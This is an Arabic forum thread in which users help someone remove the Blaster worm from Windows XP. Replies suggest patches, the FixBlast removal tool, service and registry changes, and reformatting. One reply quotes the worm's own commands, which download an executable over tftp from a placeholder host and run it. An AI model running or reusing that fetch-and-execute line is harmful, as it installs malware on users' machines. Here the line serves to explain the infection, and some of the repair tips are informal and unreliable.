ملحوظه : عندما أقوم برقع مستوى الحمايه في Pc-Cillin Firewall إلى high لا تظهر شاشة الفيروس
السلام عليكم ورحمة الله وبركاته
إنني حقا عجزت عن إزالة هذا الفايروس وبعد أن أجريت كل المحاولات من:
- تنزيل باتش مايكروسوفت
- تحديث برامج الفايروسات Pc-Cillin 2003 و NortonAntiVirus2003 و Mcafee 8.0
- عمل Scan Online من موقع Pc-Cillin ...( www.antivirus.com/free_tools )
- تحميل ملف سيمانتيك FixBlast.exe
- إعادة تنزيل Win XP Pro من جديد
ولم تنفع محاوله من هذه المحاولات ....
دعوني أشرح لكم الأمر بوضوح حول مشكلتي مع هذا الفايروس
في بداية الأمر وعند إتصالي بالشبكه وتصفحي للمواقع تظهر لي هذه الرساله :
إذا ضغطت على Dont Send تظهر لي شاشة الفايروس المعروفه لدى كثير من الناس هذه :
وإذا لم أضغط على أي شء تظهر لي أيضا بعد حوالي 10 دقائق
قمت بمحاوله وهي عندما يتظهر لي نافذة الفيروس والعد التنازلي أقوم يفتح Windows task manager (ctrl+alt+del) وأقوم بعمل End Task فلم يقبل فقمت بالضغط عليه بازر الأيسر واخترت Go to Process فيذهب بي إلى ملف اسمه winlogon.exe وعندما احاول عمل end process لها تظهر هذه الرساله :
فقمت بمحاوله أخرى وهي إيقاف هذه الشاشة ولكن افتره مؤقته عن طريق فتح نافذة Run وكتابة الأمر CMD وعندما تظهر لي نافذة الفيروسات أكتب هذا الأمر shutdown/a( وهي بمعني إلغاء عملية إعادة التشغيل ) فيتوقف فعلاً عمل الفايروس ولكن للأسف يتوقف معها معظم أوامر الكمبيوتر من عدم اكانيتي لعمل save أو copy أو delete أو تصفح الإنترنت أو فتح new window ... وغيره
فأرجوكم أن تجدوا لي حل في هذه المشكله والتي سببت لي الكثير من المشاكل
أترككمن في رعاية الله وأمنه بانتظار لآارائكم حول هذا الموضوع
ملحوظه : عندما أقوم برقع مستوى الحمايه في Pc-Cillin Firewall إلى high لا تظهر شاشة الفيروس
اول شي كيف حالك وعساك بخير
ثانيا لا يضيق صدرك ولا شي
مشكلتك ان شاء الله سهله
اتوقع انك سبق وركبت الوندز في بارتشن غير السي يعني ركبته في الدي والا الاي ان كان عندك
وانت سويت فورمات للسي ولكن الفايروس باقي في احد ه>ي البارتشنات لانها سبق وصارت معي نفس المشكله
يعني احسن شي تسويه ومضمون بادن الله هو انك تسوي اف دسك طير البارتشنات كلها وبعد ما تحمل النظام اول شي تسويه ركبت ملف الباتش اللي نزلوه ميكروسفت الخاص بالفيروس هدا وا ن شاء تنتحل المشكله
ولا تنسى توافينا با خر الاخبار
والله يوفقك
وقل ربي زدني علما
السلام عليكم ورحمة الله وبركاته
أخي " محب الهاردوير"
شكرا على ردك ولكن بالنسبه للويندوز فموجود على درايف سي
وقبل أما أنزل ويندوز قمت بعمل فورمات للدرايف وقمت بإعادة تقسيم للهارد مره أخرى
!!!!!!!!!!!!!!ماذا أفعل!!!!!!!!!!
السلام عليكم اخي العزيز
اخي مشكلة الملف ال winlogin.exe
و يستخدم نفس ال rpc
و هو فايرس يستخدم البورت 4444 و يقوم بعمل run للأوامر التاليه
C:\WINNT\system32>tftp -i x.x.x.x GET winlogin.exe
C:\WINNT\system32>start winlogin.exe
C:\WINNT\system32>winlogin.exe
و ال x هي رقم الايبي الخاص بالفايرس الغبي
و لتلغيه اخي انا انصحك تعمل اول شي نقطة اعاده افضل شيء و بعدين توكل على الله و جرب و ان شاء الله تروح ولو ما راح و خرب فرمت الجهاز لووول
سمي بالله اخي و جرب
تفتح start--> run و تكتب
cd %windir%\system32
echo 'go away' > winlogin.exe
و هذا رح يخرب الملف و ما راح يشتغل مره تانيه
و بعدين اعمل ريستارت للجهاز و اكتب
regedit
و الغي
HKLM\Software\Microsoft\Windows\CurrentVersion\Run associated with
winlogin.exe
و كمان الغي
%windir\system32\winlogin.exe and %windir\system32\yuetyutr.dll
و جرب اخي و ان شاء الله تنحل المشكله معاك و لو ما انحلت و خرب الجهاز الله بعينك اعمل فورمات و ارجع ثبت الويندوز بس على الله تنحل انا قرأت الحل بموقع اجنبي يوم من الايام لو لقيت الموقع احطه لك ان شاء الله
~ :: Programming ForEveR :: ~
Projects Accomplished
E-Commerce site – PHP, PhotoShop, FrontPage and MySQL
Mini Market Software - Visual Basic and Access
University WAP site – WML and PHP
M-commerce site – WML and PHP
University Registration System – System analysis
سبحان الله اخي تفضل هذا هو الموقع موفق اخي و الله اول ما كتبت بالبحث winlogin.exe
كاان اول موقع
تفضل و موفق ان شاء الله
https://www.dshield.org/pipermail/li...ust/009774.php
~ :: Programming ForEveR :: ~
Projects Accomplished
E-Commerce site – PHP, PhotoShop, FrontPage and MySQL
Mini Market Software - Visual Basic and Access
University WAP site – WML and PHP
M-commerce site – WML and PHP
University Registration System – System analysis
اعتقد
اعتقد
اعتقد
أن القايروس لديه في ملف ما على مجلد restore لذلك ينبغي عليه أن يلغي خدمة استعادة النظام restore حتى يتسنى له التخلص من القايروس تماما
السلام عليكم و رحمة الله و بركاته
اخي الكريم باذن الله حل هذا الفايروس ستجده عندي
للتخلص من هذا الفايروس الى الابد ما عليك الا ان تتبع الخطوات التاليه :
الذهاب الى computer management اذهب الى ايقونة جهاز الكمبيوتر الموجوده على سطح المكتب و اضغط بواسطة الفأره كليك يمين و من ثم اختيار الامر manage و بذلك سيذهب تلقائيا الى ال computer management و من ثم اختبار الامر services and applications و من ثم اختيار الامر services الان قم بالضغط على هذا الامر و سيفتح لك على جهة اليمين عدة اوامر قم باختيار الامر remote procedure call (rpc الان قم بالضغط على الامر مرتين و ستفتح لك نافذه قم باختيار الامر recovery و امامك مباشره يوجد عدة خيارات طبعا موجوده عندك على الجهاز restart the computer قم بالضغط على السهم و اختر الامر take no action و بذلك تبطل عمل الفايروس اللعين بلاستر و اذا لم تنحل المشكله ارجع لنفس الخطوات و اعمل الخيار الثاني و الثالث نفس الخيار الاول و ان شاء الله ستنحل المشكله
اذا كان هنالك اي خطأ في كلامي ارجو من اهل الخبره تصحيح الخطأ ان وجد و الله في عون العبد اذا كان العبد في عون اخيه .... شكرا ...
فلسطين ... شلت يميني ان نسيتك يا بلادي
كثر انتشار دودة W32.Blaster.Worm في بعض اجهزة الاخوة هنا في عرب هاردوير و في غيرها.
يواجه البعض إنغلاق الجهاز ويظهر للبعض هذه الرسالة التحذيرية ثم يغلق الجهاز.
اولا: يجب ان نجعل الجهاز غير قابل للانغلاق بستخدام احدى هذه الطريقتين.
1- من Run اكتب التالي shutdown -a
ثم اضغط ok
2- استخدم هذه الطريقة إن لم تستطع حسب رقم 1
من Run اكتب التالي SERVICES.MSC /S
ثم اضغط ok
في الخطوة رقم 2 سيظهر الشكل التالي:
قم بتنفيذ شرحي على الصورة بشكل دقيق، واقرا مرة واثنين وثلاثة قبل الشروع في العمل.
بعد اختيار خصائص ستظهر النافذه التاليه:
قم بعمل مثل الشرح على الصورة
ملاحظة هامه: يجب إعادة ماقمنا به الان بعد إزالة الدودة الى وضعه الاساسي.
الان الجهاز غير قابل للانغلاق.
------------------------------------------------------------
الخطوة التالية:
1 - حمل هذا الملف الخاص بوندوز XP فقط من ميكروسوفت وقم بتثبيته اضغط هنا
اختر لغة الوندوز كما في الصورة
بعد تثبيت الملف 823980 قم باعادة تشغيل جهازك ( يعني اغلقه ثم شغله).
2- حمل برنامج FixBlast من سيمانتك لأزالة الدودة.
حمل الملف التالي واحفظة في مكان معروف ( سطح المكتب مثلا)
اضغط هنا
==============
الان قم بتوقيف استعادة النظام ( System Restore)
بالماوس الايمن اضغط على my computer ثم اختر خصائص ( properties )
ستظهر النافذة التالية: نفذ العملية كما هو الشرح على الصورة.
اضغط ok
الان قم بتوقيف الفايرس اللعين عن العمل عبر الخطوات التالي:
CTRL+ALT+DELETE
ستظهر الصورة التالية:
ابحث عن ملف الدودة msblast.exe و اضغط عليه حتى يصبح لونه ازرق ثم اضغط End process
ملاحظة: لن تجد الملف إن كنت غير متصل بالانترنت.
---------------------------------------------------------------------
الان اصبح كل شي جاهز لعملية الازالة.
اذهب الى الملف الذي حملناه ووضعناه على سطح المكتب تحت اسم FixBlast ثم اضغط عليه ودع البرنامج يبحث عن الدودة ويقوم بأزالتها.
إن ظهرت لك رسالة تقول أن البرنامج لم يستطع ازالة الدودة اعد اشغال جهازك على الوضع الامن Safe mode (الطريقة موجودة في الرد الثاني) ثم قم بتشغيل برنامج FixBlast وجهازك على الوضع الامن.
سوف يظهر في النهاية عندك مثل الشكل التالي:
وهذا يعني ان الدودة انتهت.
كرر عملية تشغيل برنامج الازالة مرة ثانية وثالثة حتى تتأكد من ان الدودة اعدمة.
اخيرا: قم بسترداد وضع جهازك السابق مثل إعادة وضع تشغيل النظام الى سابق عهده كذلك إعادة ما قمنا به في البداية الى سابق عهده.
وبالتوفيق للجميع.
م....ن....ق....و....ل
عندما قمت بتحميل ويندوز مره أخرى
لا أستطبع تتنزيل الباتش على الحاسب وتظهر لي هذه الرساله
هل من الممكن أن تكون المشكله أن نسخة الزيندوز الموجوده لدي غير مرخصه
https://www.arabhardware.net/showthr...&threadid=8735
السلام عليكم
اخي العملاق Al-Mazrouei
بالفعل شرح كافي وافي و صح لسانك على هالشرح المفصل و الشيق
اخي الكريم انت كاتب اخر المقال منقول ممكن نعرف من اي موقع
و شكرا .....
فلسطين ... شلت يميني ان نسيتك يا بلادي
قمت باعادة تهيئة القرص و لت تستطع ازالة الفيروس ؟؟؟ ههه ما يصير لكن اذا تبين هذا الشي في النهاية ارجو تفصيل الموضوع بعد التاكد .
انا اتوقع ان نسخة الويندوز التي لديك معطبة .. و مثل ما ذكرت هذا الامر لا يعني وجود الفيروس .. عند حدوث مشكلة في RPC يغلق النظام نفسه .
بالله عليكم , في Cracker نزيه و مؤدب يعطي المستخدم وقت لحفظ اعماله ؟
شغل جدار الحمايه الموجود في ال xp .....اعد التشغيل .....بعد التفعيل سينقطع حبل حياة الفيروس ....نزل patch من ميكروسوفت .....run النورتون....وهذا سيكون اخر عهدك بالفيروس.
DaDuck
اذا كنت تريد ان اساعدك في هذة المشكلة فرد لي
كل هذا الكلام الذي قالوة الاصدقاء فهوة تخريف والحل سهل جدا لدي يا صديقي
عليهم
المفضلات